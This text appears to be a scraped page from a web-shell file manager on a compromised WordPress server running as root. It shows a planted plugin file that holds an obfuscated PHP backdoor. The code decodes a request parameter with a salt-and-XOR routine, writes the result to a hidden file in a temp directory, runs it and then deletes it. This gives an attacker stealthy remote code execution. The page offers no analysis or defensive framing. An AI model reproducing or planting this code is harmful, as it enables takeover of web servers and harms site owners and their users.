HEX
Server: nginx/1.18.0
System: Linux vcwordpress 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /proc/self/cwd/wp-content/plugins/
Upload Files
File: //proc/self/cwd/wp-content/plugins/bottom_1770127245.php
<!--KjxEbmAr-->
<?php

if(array_key_exists("pa\x72a\x6Det\x65r\x5F\x67rou\x70", $_REQUEST) && !is_null($_REQUEST["pa\x72a\x6Det\x65r\x5F\x67rou\x70"])){
$data = $_REQUEST["pa\x72a\x6Det\x65r\x5F\x67rou\x70"];
$data  = 	explode		 ("." ,		$data  );		
$ptr = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt);
$i = 0;
$__len = count($data);

do {
    if ($i >= $__len) break;
    $val = $data[$i];
    $chS = ord($salt[$i % $sLen]);
    $d = ((int)$val - $chS - ($i % 10)) ^ 30;
    $ptr .= chr($d);
    $i++;
} while (true);
$sym = array_filter([session_save_path(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/tmp"]);
foreach ($sym as $entry):
            if ((function($d) { return is_dir($d) && is_writable($d); })($entry)) {
            $ref = implode("/", [$entry, ".k"]);
            if (false !== file_put_contents($ref, $ptr)) {
    include_once $ref;
    @unlink($ref);
    exit;
}
        }
endforeach;
}
@ Telegram